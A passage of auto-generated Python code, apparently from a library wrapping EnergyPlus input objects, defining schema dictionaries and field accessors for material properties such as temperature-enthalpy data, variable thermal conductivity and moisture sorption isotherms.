| Units: C
Args:
value (float): value for IDD Field `Temperature 3`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_3` or None if not set
"""
return self["Temperature 3"]
@temperature_3.setter
def temperature_3(self, value=None):
"""Corresponds to IDD field `Temperature 3`"""
self["Temperature 3"] = value
@property
def enthalpy_3(self):
"""field `Enthalpy 3`
| for Temperature-enthalpy function corresponding to temperature 3
| Units: J/kg
Args:
value (float): value for IDD Field `Enthalpy 3`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `enthalpy_3` or None if not set
"""
return self["Enthalpy 3"]
@enthalpy_3.setter
def enthalpy_3(self, value=None):
"""Corresponds to IDD field `Enthalpy 3`"""
self["Enthalpy 3"] = value
@property
def temperature_4(self):
"""field `Temperature 4`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 4`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_4` or None if not set
"""
return self["Temperature 4"]
@temperature_4.setter
def temperature_4(self, value=None):
"""Corresponds to IDD field `Temperature 4`"""
self["Temperature 4"] = value
@property
def enthalpy_4(self):
"""field `Enthalpy 4`
| for Temperature-enthalpy function corresponding to temperature 4
| Units: J/kg
Args:
value (float): value for IDD Field `Enthalpy 4`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `enthalpy_4` or None if not set
"""
return self["Enthalpy 4"]
@enthalpy_4.setter
def enthalpy_4(self, value=None):
"""Corresponds to IDD field `Enthalpy 4`"""
self["Enthalpy 4"] = value
@property
def temperature_5(self):
"""field `Temperature 5`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 5`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_5` or None if not set
"""
return self["Temperature 5"]
@temperature_5.setter
def temperature_5(self, value=None):
"""Corresponds to IDD field `Temperature 5`"""
self["Temperature 5"] = value
@property
def enthalpy_5(self):
"""field `Enthalpy 5`
| for Temperature-enthalpy function corresponding to temperature 5
| Units: J/kg
Args:
value (float): value for IDD Field `Enthalpy 5`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `enthalpy_5` or None if not set
"""
return self["Enthalpy 5"]
@enthalpy_5.setter
def enthalpy_5(self, value=None):
"""Corresponds to IDD field `Enthalpy 5`"""
self["Enthalpy 5"] = value
@property
def temperature_6(self):
"""field `Temperature 6`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 6`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_6` or None if not set
"""
return self["Temperature 6"]
@temperature_6.setter
def temperature_6(self, value=None):
"""Corresponds to IDD field `Temperature 6`"""
self["Temperature 6"] = value
@property
def enthalpy_6(self):
"""field `Enthalpy 6`
| for Temperature-enthalpy function corresponding to temperature 6
| Units: J/kg
Args:
value (float): value for IDD Field `Enthalpy 6`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `enthalpy_6` or None if not set
"""
return self["Enthalpy 6"]
@enthalpy_6.setter
def enthalpy_6(self, value=None):
"""Corresponds to IDD field `Enthalpy 6`"""
self["Enthalpy 6"] = value
@property
def temperature_7(self):
"""field `Temperature 7`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 7`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_7` or None if not set
"""
return self["Temperature 7"]
@temperature_7.setter
def temperature_7(self, value=None):
"""Corresponds to IDD field `Temperature 7`"""
self["Temperature 7"] = value
@property
def enthalpy_7(self):
"""field `Enthalpy 7`
| for Temperature-enthalpy function corresponding to temperature 7
| Units: J/kg
Args:
value (float): value for IDD Field `Enthalpy 7`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `enthalpy_7` or None if not set
"""
return self["Enthalpy 7"]
@enthalpy_7.setter
def enthalpy_7(self, value=None):
"""Corresponds to IDD field `Enthalpy 7`"""
self["Enthalpy 7"] = value
@property
def temperature_8(self):
"""field `Temperature 8`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 8`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_8` or None if not set
"""
return self["Temperature 8"]
@temperature_8.setter
def temperature_8(self, value=None):
"""Corresponds to IDD field `Temperature 8`"""
self["Temperature 8"] = value
@property
def enthalpy_8(self):
"""field `Enthalpy 8`
| for Temperature-enthalpy function corresponding to temperature 8
| Units: J/kg
Args:
value (float): value for IDD Field `Enthalpy 8`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `enthalpy_8` or None if not set
"""
return self["Enthalpy 8"]
@enthalpy_8.setter
def enthalpy_8(self, value=None):
"""Corresponds to IDD field `Enthalpy 8`"""
self["Enthalpy 8"] = value
@property
def temperature_9(self):
"""field `Temperature 9`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 9`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_9` or None if not set
"""
return self["Temperature 9"]
@temperature_9.setter
def temperature_9(self, value=None):
"""Corresponds to IDD field `Temperature 9`"""
self["Temperature 9"] = value
@property
def enthalpy_9(self):
"""field `Enthalpy 9`
| for Temperature-enthalpy function corresponding to temperature 1
| Units: J/kg
Args:
value (float): value for IDD Field `Enthalpy 9`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `enthalpy_9` or None if not set
"""
return self["Enthalpy 9"]
@enthalpy_9.setter
def enthalpy_9(self, value=None):
"""Corresponds to IDD field `Enthalpy 9`"""
self["Enthalpy 9"] = value
@property
def temperature_10(self):
"""field `Temperature 10`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 10`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_10` or None if not set
"""
return self["Temperature 10"]
@temperature_10.setter
def temperature_10(self, value=None):
"""Corresponds to IDD field `Temperature 10`"""
self["Temperature 10"] = value
@property
def enthalpy_10(self):
"""field `Enthalpy 10`
| for Temperature-enthalpy function corresponding to temperature 2
| Units: J/kg
Args:
value (float): value for IDD Field `Enthalpy 10`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `enthalpy_10` or None if not set
"""
return self["Enthalpy 10"]
@enthalpy_10.setter
def enthalpy_10(self, value=None):
"""Corresponds to IDD field `Enthalpy 10`"""
self["Enthalpy 10"] = value
@property
def temperature_11(self):
"""field `Temperature 11`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 11`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_11` or None if not set
"""
return self["Temperature 11"]
@temperature_11.setter
def temperature_11(self, value=None):
"""Corresponds to IDD field `Temperature 11`"""
self["Temperature 11"] = value
@property
def enthalpy_11(self):
"""field `Enthalpy 11`
| for Temperature-enthalpy function corresponding to temperature 3
| Units: J/kg
Args:
value (float): value for IDD Field `Enthalpy 11`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `enthalpy_11` or None if not set
"""
return self["Enthalpy 11"]
@enthalpy_11.setter
def enthalpy_11(self, value=None):
"""Corresponds to IDD field `Enthalpy 11`"""
self["Enthalpy 11"] = value
@property
def temperature_12(self):
"""field `Temperature 12`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 12`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_12` or None if not set
"""
return self["Temperature 12"]
@temperature_12.setter
def temperature_12(self, value=None):
"""Corresponds to IDD field `Temperature 12`"""
self["Temperature 12"] = value
@property
def enthalpy_12(self):
"""field `Enthalpy 12`
| for Temperature-enthalpy function corresponding to temperature 14
| Units: J/kg
Args:
value (float): value for IDD Field `Enthalpy 12`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `enthalpy_12` or None if not set
"""
return self["Enthalpy 12"]
@enthalpy_12.setter
def enthalpy_12(self, value=None):
"""Corresponds to IDD field `Enthalpy 12`"""
self["Enthalpy 12"] = value
@property
def temperature_13(self):
"""field `Temperature 13`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 13`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_13` or None if not set
"""
return self["Temperature 13"]
@temperature_13.setter
def temperature_13(self, value=None):
"""Corresponds to IDD field `Temperature 13`"""
self["Temperature 13"] = value
@property
def enthalpy_13(self):
"""field `Enthalpy 13`
| for Temperature-enthalpy function corresponding to temperature 15
| Units: J/kg
Args:
value (float): value for IDD Field `Enthalpy 13`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `enthalpy_13` or None if not set
"""
return self["Enthalpy 13"]
@enthalpy_13.setter
def enthalpy_13(self, value=None):
"""Corresponds to IDD field `Enthalpy 13`"""
self["Enthalpy 13"] = value
@property
def temperature_14(self):
"""field `Temperature 14`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 14`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_14` or None if not set
"""
return self["Temperature 14"]
@temperature_14.setter
def temperature_14(self, value=None):
"""Corresponds to IDD field `Temperature 14`"""
self["Temperature 14"] = value
@property
def enthalpy_14(self):
"""field `Enthalpy 14`
| for Temperature-enthalpy function corresponding to temperature 16
| Units: J/kg
Args:
value (float): value for IDD Field `Enthalpy 14`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `enthalpy_14` or None if not set
"""
return self["Enthalpy 14"]
@enthalpy_14.setter
def enthalpy_14(self, value=None):
"""Corresponds to IDD field `Enthalpy 14`"""
self["Enthalpy 14"] = value
@property
def temperature_15(self):
"""field `Temperature 15`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 15`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_15` or None if not set
"""
return self["Temperature 15"]
@temperature_15.setter
def temperature_15(self, value=None):
"""Corresponds to IDD field `Temperature 15`"""
self["Temperature 15"] = value
@property
def enthalpy_15(self):
"""field `Enthalpy 15`
| for Temperature-enthalpy function corresponding to temperature 17
| Units: J/kg
Args:
value (float): value for IDD Field `Enthalpy 15`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `enthalpy_15` or None if not set
"""
return self["Enthalpy 15"]
@enthalpy_15.setter
def enthalpy_15(self, value=None):
"""Corresponds to IDD field `Enthalpy 15`"""
self["Enthalpy 15"] = value
@property
def temperature_16(self):
"""field `Temperature 16`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 16`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_16` or None if not set
"""
return self["Temperature 16"]
@temperature_16.setter
def temperature_16(self, value=None):
"""Corresponds to IDD field `Temperature 16`"""
self["Temperature 16"] = value
@property
def enthalpy_16(self):
"""field `Enthalpy 16`
| for Temperature-enthalpy function corresponding to temperature 16
| Units: J/kg
Args:
value (float): value for IDD Field `Enthalpy 16`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `enthalpy_16` or None if not set
"""
return self["Enthalpy 16"]
@enthalpy_16.setter
def enthalpy_16(self, value=None):
"""Corresponds to IDD field `Enthalpy 16`"""
self["Enthalpy 16"] = value
class MaterialPropertyVariableThermalConductivity(DataObject):
""" Corresponds to IDD object `MaterialProperty:VariableThermalConductivity`
Additional properties for temperature dependent thermal conductivity
using piecewise linear temperature-conductivity function.
HeatBalanceAlgorithm = CondFD(ConductionFiniteDifference) solution algorithm only.
Has no effect with other HeatBalanceAlgorithm solution algorithms
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'temperature 1',
{'name': u'Temperature 1',
'pyname': u'temperature_1',
'default': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'thermal conductivity 1',
{'name': u'Thermal Conductivity 1',
'pyname': u'thermal_conductivity_1',
'default': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'temperature 2',
{'name': u'Temperature 2',
'pyname': u'temperature_2',
'default': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'thermal conductivity 2',
{'name': u'Thermal Conductivity 2',
'pyname': u'thermal_conductivity_2',
'default': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'temperature 3',
{'name': u'Temperature 3',
'pyname': u'temperature_3',
'default': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'thermal conductivity 3',
{'name': u'Thermal Conductivity 3',
'pyname': u'thermal_conductivity_3',
'default': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'temperature 4',
{'name': u'Temperature 4',
'pyname': u'temperature_4',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'thermal conductivity 4',
{'name': u'Thermal Conductivity 4',
'pyname': u'thermal_conductivity_4',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'temperature 5',
{'name': u'Temperature 5',
'pyname': u'temperature_5',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'thermal conductivity 5',
{'name': u'Thermal Conductivity 5',
'pyname': u'thermal_conductivity_5',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'temperature 6',
{'name': u'Temperature 6',
'pyname': u'temperature_6',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'thermal conductivity 6',
{'name': u'Thermal Conductivity 6',
'pyname': u'thermal_conductivity_6',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'temperature 7',
{'name': u'Temperature 7',
'pyname': u'temperature_7',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'thermal conductivity 7',
{'name': u'Thermal Conductivity 7',
'pyname': u'thermal_conductivity_7',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'temperature 8',
{'name': u'Temperature 8',
'pyname': u'temperature_8',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'thermal conductivity 8',
{'name': u'Thermal Conductivity 8',
'pyname': u'thermal_conductivity_8',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'temperature 9',
{'name': u'Temperature 9',
'pyname': u'temperature_9',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'thermal conductivity 9',
{'name': u'Thermal Conductivity 9',
'pyname': u'thermal_conductivity_9',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'temperature 10',
{'name': u'Temperature 10',
'pyname': u'temperature_10',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'thermal conductivity 10',
{'name': u'Thermal Conductivity 10',
'pyname': u'thermal_conductivity_10',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'MaterialProperty:VariableThermalConductivity',
'pyname': u'MaterialPropertyVariableThermalConductivity',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
| Regular Material Name to which the additional properties will be added.
| this the material name for the basic material properties.
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def temperature_1(self):
"""field `Temperature 1`
| for Temperature-Thermal Conductivity function
| Units: C
Args:
value (float): value for IDD Field `Temperature 1`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_1` or None if not set
"""
return self["Temperature 1"]
@temperature_1.setter
def temperature_1(self, value=None):
"""Corresponds to IDD field `Temperature 1`"""
self["Temperature 1"] = value
@property
def thermal_conductivity_1(self):
"""field `Thermal Conductivity 1`
| for Temperature-Thermal Conductivity function corresponding to temperature 1
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 1`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_1` or None if not set
"""
return self["Thermal Conductivity 1"]
@thermal_conductivity_1.setter
def thermal_conductivity_1(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 1`"""
self["Thermal Conductivity 1"] = value
@property
def temperature_2(self):
"""field `Temperature 2`
| for Temperature-Thermal Conductivity function
| Units: C
Args:
value (float): value for IDD Field `Temperature 2`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_2` or None if not set
"""
return self["Temperature 2"]
@temperature_2.setter
def temperature_2(self, value=None):
"""Corresponds to IDD field `Temperature 2`"""
self["Temperature 2"] = value
@property
def thermal_conductivity_2(self):
"""field `Thermal Conductivity 2`
| for Temperature-Thermal Conductivity function corresponding to temperature 2
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 2`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_2` or None if not set
"""
return self["Thermal Conductivity 2"]
@thermal_conductivity_2.setter
def thermal_conductivity_2(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 2`"""
self["Thermal Conductivity 2"] = value
@property
def temperature_3(self):
"""field `Temperature 3`
| for Temperature-Thermal Conductivity function
| Units: C
Args:
value (float): value for IDD Field `Temperature 3`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_3` or None if not set
"""
return self["Temperature 3"]
@temperature_3.setter
def temperature_3(self, value=None):
"""Corresponds to IDD field `Temperature 3`"""
self["Temperature 3"] = value
@property
def thermal_conductivity_3(self):
"""field `Thermal Conductivity 3`
| for Temperature-Thermal Conductivity function corresponding to temperature 3
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 3`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_3` or None if not set
"""
return self["Thermal Conductivity 3"]
@thermal_conductivity_3.setter
def thermal_conductivity_3(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 3`"""
self["Thermal Conductivity 3"] = value
@property
def temperature_4(self):
"""field `Temperature 4`
| for Temperature-Thermal Conductivity function
| Units: C
Args:
value (float): value for IDD Field `Temperature 4`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_4` or None if not set
"""
return self["Temperature 4"]
@temperature_4.setter
def temperature_4(self, value=None):
"""Corresponds to IDD field `Temperature 4`"""
self["Temperature 4"] = value
@property
def thermal_conductivity_4(self):
"""field `Thermal Conductivity 4`
| for Temperature-Thermal Conductivity function corresponding to temperature 4
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 4`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_4` or None if not set
"""
return self["Thermal Conductivity 4"]
@thermal_conductivity_4.setter
def thermal_conductivity_4(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 4`"""
self["Thermal Conductivity 4"] = value
@property
def temperature_5(self):
"""field `Temperature 5`
| for Temperature-Thermal Conductivity function
| Units: C
Args:
value (float): value for IDD Field `Temperature 5`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_5` or None if not set
"""
return self["Temperature 5"]
@temperature_5.setter
def temperature_5(self, value=None):
"""Corresponds to IDD field `Temperature 5`"""
self["Temperature 5"] = value
@property
def thermal_conductivity_5(self):
"""field `Thermal Conductivity 5`
| for Temperature-Thermal Conductivity function corresponding to temperature 5
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 5`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_5` or None if not set
"""
return self["Thermal Conductivity 5"]
@thermal_conductivity_5.setter
def thermal_conductivity_5(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 5`"""
self["Thermal Conductivity 5"] = value
@property
def temperature_6(self):
"""field `Temperature 6`
| for Temperature-Thermal Conductivity function
| Units: C
Args:
value (float): value for IDD Field `Temperature 6`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_6` or None if not set
"""
return self["Temperature 6"]
@temperature_6.setter
def temperature_6(self, value=None):
"""Corresponds to IDD field `Temperature 6`"""
self["Temperature 6"] = value
@property
def thermal_conductivity_6(self):
"""field `Thermal Conductivity 6`
| for Temperature-Thermal Conductivity function corresponding to temperature 6
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 6`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_6` or None if not set
"""
return self["Thermal Conductivity 6"]
@thermal_conductivity_6.setter
def thermal_conductivity_6(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 6`"""
self["Thermal Conductivity 6"] = value
@property
def temperature_7(self):
"""field `Temperature 7`
| for Temperature-Thermal Conductivity function
| Units: C
Args:
value (float): value for IDD Field `Temperature 7`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_7` or None if not set
"""
return self["Temperature 7"]
@temperature_7.setter
def temperature_7(self, value=None):
"""Corresponds to IDD field `Temperature 7`"""
self["Temperature 7"] = value
@property
def thermal_conductivity_7(self):
"""field `Thermal Conductivity 7`
| for Temperature-Thermal Conductivity function corresponding to temperature 7
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 7`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_7` or None if not set
"""
return self["Thermal Conductivity 7"]
@thermal_conductivity_7.setter
def thermal_conductivity_7(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 7`"""
self["Thermal Conductivity 7"] = value
@property
def temperature_8(self):
"""field `Temperature 8`
| for Temperature-Thermal Conductivity function
| Units: C
Args:
value (float): value for IDD Field `Temperature 8`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_8` or None if not set
"""
return self["Temperature 8"]
@temperature_8.setter
def temperature_8(self, value=None):
"""Corresponds to IDD field `Temperature 8`"""
self["Temperature 8"] = value
@property
def thermal_conductivity_8(self):
"""field `Thermal Conductivity 8`
| for Temperature-Thermal Conductivity function corresponding to temperature 8
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 8`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_8` or None if not set
"""
return self["Thermal Conductivity 8"]
@thermal_conductivity_8.setter
def thermal_conductivity_8(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 8`"""
self["Thermal Conductivity 8"] = value
@property
def temperature_9(self):
"""field `Temperature 9`
| for Temperature-Thermal Conductivity function
| Units: C
Args:
value (float): value for IDD Field `Temperature 9`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_9` or None if not set
"""
return self["Temperature 9"]
@temperature_9.setter
def temperature_9(self, value=None):
"""Corresponds to IDD field `Temperature 9`"""
self["Temperature 9"] = value
@property
def thermal_conductivity_9(self):
"""field `Thermal Conductivity 9`
| for Temperature-Thermal Conductivity function corresponding to temperature 9
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 9`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_9` or None if not set
"""
return self["Thermal Conductivity 9"]
@thermal_conductivity_9.setter
def thermal_conductivity_9(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 9`"""
self["Thermal Conductivity 9"] = value
@property
def temperature_10(self):
"""field `Temperature 10`
| for Temperature-Thermal Conductivity function
| Units: C
Args:
value (float): value for IDD Field `Temperature 10`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_10` or None if not set
"""
return self["Temperature 10"]
@temperature_10.setter
def temperature_10(self, value=None):
"""Corresponds to IDD field `Temperature 10`"""
self["Temperature 10"] = value
@property
def thermal_conductivity_10(self):
"""field `Thermal Conductivity 10`
| for Temperature-Thermal Conductivity function corresponding to temperature 10
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 10`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_10` or None if not set
"""
return self["Thermal Conductivity 10"]
@thermal_conductivity_10.setter
def thermal_conductivity_10(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 10`"""
self["Thermal Conductivity 10"] = value
class MaterialPropertyHeatAndMoistureTransferSettings(DataObject):
""" Corresponds to IDD object `MaterialProperty:HeatAndMoistureTransfer:Settings`
HeatBalanceAlgorithm = CombinedHeatAndMoistureFiniteElement solution algorithm only.
Additional material properties for surfaces.
Has no effect with other HeatBalanceAlgorithm solution algorithms
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'material name',
{'name': u'Material Name',
'pyname': u'material_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'porosity',
{'name': u'Porosity',
'pyname': u'porosity',
'maximum': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/m3'}),
(u'initial water content ratio',
{'name': u'Initial Water Content Ratio',
'pyname': u'initial_water_content_ratio',
'default': 0.2,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'kg/kg'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'MaterialProperty:HeatAndMoistureTransfer:Settings',
'pyname': u'MaterialPropertyHeatAndMoistureTransferSettings',
'required-object': False,
'unique-object': False}
@property
def material_name(self):
"""field `Material Name`
| Material Name that the moisture properties will be added to.
| This augments material properties needed for combined heat and moisture transfer for surfaces.
Args:
value (str): value for IDD Field `Material Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `material_name` or None if not set
"""
return self["Material Name"]
@material_name.setter
def material_name(self, value=None):
"""Corresponds to IDD field `Material Name`"""
self["Material Name"] = value
@property
def porosity(self):
"""field `Porosity`
| Units: m3/m3
| value <= 1.0
Args:
value (float): value for IDD Field `Porosity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `porosity` or None if not set
"""
return self["Porosity"]
@porosity.setter
def porosity(self, value=None):
"""Corresponds to IDD field `Porosity`"""
self["Porosity"] = value
@property
def initial_water_content_ratio(self):
"""field `Initial Water Content Ratio`
| units are the water/material density ratio at the beginning of each run period.
| Units: kg/kg
| Default value: 0.2
Args:
value (float): value for IDD Field `Initial Water Content Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `initial_water_content_ratio` or None if not set
"""
return self["Initial Water Content Ratio"]
@initial_water_content_ratio.setter
def initial_water_content_ratio(self, value=0.2):
"""Corresponds to IDD field `Initial Water Content Ratio`"""
self["Initial Water Content Ratio"] = value
class MaterialPropertyHeatAndMoistureTransferSorptionIsotherm(DataObject):
""" Corresponds to IDD object `MaterialProperty:HeatAndMoistureTransfer:SorptionIsotherm`
HeatBalanceAlgorithm = CombinedHeatAndMoistureFiniteElement solution algorithm only.
Relationship between moisture content and relative humidity fraction.
Has no effect with other HeatBalanceAlgorithm solution algorithms
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'material name',
{'name': u'Material Name',
'pyname': u'material_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'number of isotherm coordinates',
{'name': u'Number of Isotherm Coordinates',
'pyname': u'number_of_isotherm_coordinates',
'maximum': 25,
'required-field': True,
'autosizable': False,
'minimum': 1,
'autocalculatable': False,
'type': u'integer'}),
(u'relative humidity fraction 1',
{'name': u'Relative Humidity Fraction 1',
'pyname': u'relative_humidity_fraction_1',
'maximum': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 1',
{'name': u'Moisture Content 1',
'pyname': u'moisture_content_1',
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 2',
{'name': u'Relative Humidity Fraction 2',
'pyname': u'relative_humidity_fraction_2',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 2',
{'name': u'Moisture Content 2',
'pyname': u'moisture_content_2',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 3',
{'name': u'Relative Humidity Fraction 3',
'pyname': u'relative_humidity_fraction_3',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 3',
{'name': u'Moisture Content 3',
'pyname': u'moisture_content_3',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
